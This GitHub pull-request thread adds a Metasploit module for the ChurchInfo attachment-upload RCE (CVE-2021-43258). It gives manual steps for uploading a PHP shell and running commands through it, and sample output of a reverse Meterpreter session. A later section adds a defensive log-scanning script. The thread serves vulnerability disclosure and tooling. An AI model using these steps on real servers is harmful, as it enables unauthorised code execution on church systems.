
Adding exploit for ChurchInfo 1.2.13-1.3.0 RCE (CVE-2021-43258) #17257

Merged: 5 commits, Nov 19, 2022

Conversation

m4lwhere
Contributor

@m4lwhere m4lwhere commented Nov 13, 2022

ChurchInfo is a PHP application used to help churches manage systems and users as an open-source project. There are various vulnerabilities in the ChurchInfo 1.3.0 software which can be exploited by an attacker; this module targets an authenticated remote code execution (RCE) vulnerability.

ChurchInfo 1.3.0 has functionality to email users from the database with attachments. When preparing the email, the attachment draft is saved in the /churchinfo/tmp_attach/ folder. Before the email is sent, the file put into the attachment can be loaded in the application. RCE exists when uploading malicious PHP as an attachment.

This vulnerability was assigned CVE-2021-43258.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Within msfconsole, use the exploits/multi/http/churchinfo_upload_exec module.
  • Set the target RHOST, APPBASE, username, and password values.
  • Tested and works properly against the application; this was reported to the ChurchInfo developers last year.
  • This exploit only affects the PHP application to perform a Remote Code Execution.

How it Works:

There is a draft email function within the application which allows users to upload attachments. Before the attachments are sent, they are stored in a directory named /tmp_attach as a direct file. This allows malicious PHP files to be uploaded and executed by the PHP engine used by the application.

Successful exploitation will appear with a similar output as below:

msf6 exploit(multi/http/churchinfo_upload_exec) > run

[*] Started reverse TCP handler on 192.168.1.240:4444
[+] Logged into application as admin
[*] Navigating to add items to cart
[+] Items in Cart: 3
[+] Uploading exploit via Email temp email attachment
[+] Exploit uploaded to /churchinfo/tmp_attach/FjuIxnXKe.php
[!] Don't forget to clean up artifacts at /churchinfo/tmp_attach/FjuIxnXKe.php
[*] Sending stage (39927 bytes) to 192.168.1.72
[*] Meterpreter session 2 opened (192.168.1.240:4444 -> 192.168.1.72:37250) at 2022-11-12 21:38:30 -0500

meterpreter >

Manual Exploitation Steps:

  1. Log into the ChurchInfo application
  2. Browse to the SelectList.php page and click the "Add to Cart" button
  3. Browse to CartView.php and click "Compose Email"
  4. Attach a PHP shell as the "attach file", place anything in the subject and message, click "Save Email"
  5. Navigate to http://127.0.0.1/churchinfo/tmp_attach/exploit.php?cmd=pwd
  6. Any PHP code is executed

Please let me know if any additional information is needed, I've read through the contribution documentation and believe that I've been able to meet all requirements.
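As an added example from the defender's side (not part of this PR or the Metasploit module), the following Python script scans Apache "combined" access log lines for requests that execute PHP from the tmp_attach directory described above. The log lines are constructed for illustration; the default application base of /churchinfo and the list of PHP-executed extensions are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache "combined" access log lines (not taken from the PR).
SAMPLE_LOG = """\
192.168.1.72 - - [12/Nov/2022:21:38:10 -0500] "GET /churchinfo/CartView.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.72 - - [12/Nov/2022:21:38:29 -0500] "GET /churchinfo/tmp_attach/FjuIxnXKe.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.72 - - [12/Nov/2022:21:38:31 -0500] "GET /churchinfo/tmp_attach/exploit.php?cmd=pwd HTTP/1.1" 200 44 "-" "curl/7.81.0"
192.168.1.72 - - [12/Nov/2022:21:40:02 -0500] "GET /churchinfo/tmp_attach/agenda.pdf HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
192.168.1.72 - - [12/Nov/2022:21:41:15 -0500] "GET /churchinfo/tmp_attach/%66oo.PhP HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Extensions a typical Apache PHP handler executes; assumed here, adjust to the server's config.
PHP_EXT_RE = re.compile(r'\.(?:php\d?|phtml)$', re.IGNORECASE)


def is_tmp_attach_php_request(target, appbase="/churchinfo"):
    """True if the request path points at a PHP-executable file under tmp_attach.

    The query string is dropped and percent-encoding decoded first, so
    "%66oo.PhP?cmd=id" is recognised as foo.PhP.
    """
    path = unquote(target.split("?", 1)[0])
    prefix = appbase.rstrip("/") + "/tmp_attach/"
    return path.lower().startswith(prefix.lower()) and bool(PHP_EXT_RE.search(path))


def find_suspicious(log_text, appbase="/churchinfo"):
    """Return (ip, timestamp, target, status) for each PHP request under tmp_attach.

    A 200 means the server executed the attachment; any other status is an attempt.
    Legitimate attachments (PDFs, images) never match, so the rule is low-noise.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_tmp_attach_php_request(m["target"], appbase):
            hits.append((m["ip"], m["ts"], m["target"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, ts, target, status in find_suspicious(SAMPLE_LOG):
        verdict = "EXECUTED" if status == 200 else "attempt"
        print(f"[{verdict}] {ts} {ip} -> {target} ({status})")
```

Any hit is worth an alert: the tmp_attach directory should only ever hold draft attachments, and the same check also shows which files to remove during cleanup.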

@m4lwhere
Contributor Author

m4lwhere commented Nov 15, 2022

This should cover all of the comments, thanks for the feedback. My most recent commit has also added a check to make sure the exploit was uploaded properly to the server. Previously it was attempting the upload then blindly trying to execute it.

@gwillcox-r7 gwillcox-r7 self-assigned this Nov 16, 2022
@gwillcox-r7 gwillcox-r7 added the needs-linting The module needs additional work to pass our automated linting rules label Nov 16, 2022
@github-actions

github-actions bot commented Nov 16, 2022

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

This will enable additional information and details about the exploit as it is launched. Verbose output will appear as similar to below:

```
msf6 exploit(multi/http/churchinfo_upload_exec) > run
```

Contributor

@gwillcox-r7 gwillcox-r7 Nov 16, 2022


Output should show setting up the various options and the output of show options so that we can see what settings you are running the exploit with. Important for maintenance down the line.

Contributor Author

@m4lwhere m4lwhere Nov 18, 2022


Added the show options as well

Contributor

@gwillcox-r7 gwillcox-r7 Nov 18, 2022


@m4lwhere Don't know if this was in a commit you didn't upload but I'm not seeing this in the latest edition of this code?

Member

@jmartin-r7 jmartin-r7 left a comment

Looks great, a couple more ideas for adjustment that may make this code a bit simpler.

@m4lwhere
Contributor Author

m4lwhere commented Nov 18, 2022

Implemented all of the latest comments, thank you for all of the info! I've run rubocop and msftidy as well.

@gwillcox-r7
Contributor

gwillcox-r7 commented Nov 18, 2022

Another idea for a check method is to grab Update1_2_14To1_3_0.php. If that file exists then we are on version 1.3.0 of the target server. If we get 404s or anything other than a 200 OK then we know we are not targeting 1.3.0 of ChurchInfo.

@gwillcox-r7
Contributor

gwillcox-r7 commented Nov 18, 2022

So another thing I noticed. This bug doesn't just exist in 1.3.0. It also exists in 1.2.14 and 1.2.13 from what I can tell. Versions prior to this did not have the tmp_attach folder and do not contain the vulnerable upload code.

@gwillcox-r7
Contributor

gwillcox-r7 commented Nov 18, 2022

Added in a check method to allow the module to check if the target is vulnerable and then also used prepend Msf::Exploit::Remote::AutoCheck to make sure this is always run before exploiting to prevent exploitation if the target is not vulnerable. Users can override this if needed though.

@gwillcox-r7 gwillcox-r7 force-pushed the churchinfo-exploit branch 2 times, most recently from 543b300 to c6376fd Compare Nov 19, 2022
@gwillcox-r7 gwillcox-r7 added rn-modules release notes for new or majorly enhanced modules and removed needs-linting The module needs additional work to pass our automated linting rules labels Nov 19, 2022
@gwillcox-r7
Contributor

gwillcox-r7 commented Nov 19, 2022

Release Notes

A new module has been added for CVE-2021-43258 which exploits a flaw whereby, when emailing users in the ChurchInfo database with attachments, the uploaded file is hosted in a web accessible location under the ChurchInfo web root before the email is sent. An authenticated attacker can abuse this to gain RCE as the www-user user.

@gwillcox-r7 gwillcox-r7 changed the title Adding exploit for ChurchInfo 1.3.0 (CVE-2021-43258) Adding exploit for ChurchInfo 1.2.13-1.3.0 (CVE-2021-43258) Nov 19, 2022
@gwillcox-r7 gwillcox-r7 changed the title Adding exploit for ChurchInfo 1.2.13-1.3.0 (CVE-2021-43258) Adding exploit for ChurchInfo 1.2.13-1.3.0 RCE (CVE-2021-43258) Nov 19, 2022
@gwillcox-r7 gwillcox-r7 merged commit 8ca7550 into rapid7:master Nov 19, 2022
23 checks passed